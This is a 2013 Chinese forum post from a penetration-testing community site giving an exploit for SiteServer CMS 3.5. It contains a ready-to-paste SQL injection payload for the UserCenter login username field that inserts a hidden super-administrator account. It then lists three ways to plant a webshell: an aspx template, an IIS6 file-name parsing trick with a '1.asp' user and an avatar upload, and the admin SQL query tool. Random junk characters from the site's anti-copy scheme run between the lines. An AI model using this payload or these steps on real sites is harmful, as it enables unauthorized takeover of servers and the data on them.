中国网络渗透测试联盟
标题:
SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
[打印本页]
作者:
admin
时间:
2013-2-16 21:40
标题:
SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
经测试秒杀最新的3.5版
+ ^/ _$ f$ D8 m! O5 _
stieserver官网:
www.siteserver.cn
" Q1 y/ W$ A5 U. u: M+ S
EXP:
- C& O" H8 D8 e* V {
直接访问UserCenter/login.aspx
5 t6 D6 a1 D8 u2 l
用户名处输入:
( C# {% ~* F1 d; L
) @# ~$ h1 Z W. O
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
- e4 K- G# \7 \! H r
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
0 z) W) I4 |% U! p
之后再访问后台SiteServer/login.aspx用插入的用户登陆
& z: Z" u! G/ v; {, r) {
后台拿webshell的三种方法:
& R* _- H$ q9 I) j, G
一、
2 ^/ X' k( T7 m9 Y# \) i$ W
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
% U M4 _; [: n% y- ^; l5 A
二、
5 P; ^1 o2 J% @. t: f7 _: {" m
成员权限-》添加用户-》用户名为:1.asp
+ h; f ]2 b( A( _7 h1 N1 s
http://127.0.0.1/usercenter/
5 G7 O& `7 z! ?' h$ t
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
: P% m9 S; S0 Z. X- i' d
(ps:后台添加用户时不会验证是否含有非法字符)
& J8 \$ b" T7 H/ r' b, X# R0 ^
三、
0 F( D- V" x A; [0 W/ e' r0 Y: C, R
系统工具-》实用工具-》机器参数查看
; @; n4 b- p3 D; F* x6 _
可以看到数据库类型、名称,WEB路径
/ P' C8 O$ {6 {6 v' s5 ~+ F
系统工具-》数据库工具-》SQL语句查询
" x6 l& r; h0 Z; U
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2